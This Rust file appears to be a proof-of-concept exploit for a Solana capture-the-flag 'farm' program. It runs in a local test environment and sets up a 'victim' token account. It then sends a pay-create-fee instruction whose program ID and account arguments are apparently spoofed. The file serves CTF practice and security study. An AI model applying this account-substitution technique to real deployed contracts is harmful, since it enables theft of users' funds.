use std::{env, str::FromStr};


use ctf_solana_farm::state::Farm;
use ctf_solana_farm::instruction::ix_pay_create_fee;
use poc_framework::{
    keypair, solana_sdk::signer::Signer, Environment, LocalEnvironment, PrintableTransaction
};
use solana_program::{pubkey::Pubkey, native_token::sol_to_lamports};
use borsh::BorshSerialize;

fn main() {
    setup();
}
pub fn get_vault_address(authority: Pubkey, wallet_program: Pubkey) -> Pubkey {
    let (vault_address, _) = Pubkey::find_program_address(
        &[&authority.to_bytes(), &"VAULT".as_bytes()],
        &wallet_program,
    );
    vault_address
}


fn setup() -> u8 {
    let mut dir = env::current_exe().unwrap();
    let path = {
        dir.pop();
        dir.pop();
        dir.push("deploy");
        dir.push("ctf_solana_farm.so");
        dir.to_str()
    }
    .unwrap();
    let program = Pubkey::from_str("W4113t3333333333333333333333333333333333333").unwrap();
    
    let farm = keypair(123);
    let authority = Pubkey::create_program_address(&[&farm.pubkey().to_bytes(), &[12]], &program).unwrap();
    let victim = keypair(4);
    let mint = keypair(5);

    let mut env = LocalEnvironment::builder()
        .add_program(program, path)
        .add_account_with_tokens(victim.pubkey(), mint.pubkey(), farm.pubkey(), sol_to_lamports(31337.0))
        .add_account_with_lamports(
            authority,
            program,
            sol_to_lamports(100000.0))    
        .build();

    
    let farm_vec = Farm {
        enabled: 0,
        nonce: 12,
        token_program_id: program,
        creator: farm.pubkey(),
        fee_vault: farm.pubkey()
    };
    env.create_account_with_data(&farm, farm_vec.try_to_vec().unwrap());
    env.execute_as_transaction(
        &[ix_pay_create_fee(
            &farm.pubkey(),
            &authority,
            &farm.pubkey(),
            &farm.pubkey(),
            &victim.pubkey(),
            &program,
            &program,
            5000
        )],
        &[&farm])
        .print();
    
    1
}